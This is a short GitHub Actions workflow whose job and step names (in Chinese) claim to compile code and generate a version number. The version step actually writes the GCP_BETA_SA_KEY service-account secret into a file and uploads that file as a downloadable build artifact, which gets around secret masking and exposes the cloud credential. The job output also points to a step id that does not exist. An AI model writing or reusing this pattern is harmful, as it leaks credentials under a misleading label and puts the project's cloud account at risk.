name: main action
on:
  push:
    branches: [ main ]
  workflow_dispatch:
    branches: [ main ]
env:
  IMAGE_NAME: image183
jobs:
  build_web:
    name: 編譯程式
    runs-on: ubuntu-latest
    outputs:
      BUILD_VERSION: ${{ steps.generate_build_version.outputs.build_version }}
    steps:
      - name: 產生版本號
        run: |
          echo ${{secrets.GCP_BETA_SA_KEY}} >> test
      - name: 留存artifact
        uses: actions/upload-artifact@v2
        with:
          name: publish
          path: |
            test
          retention-days: 1
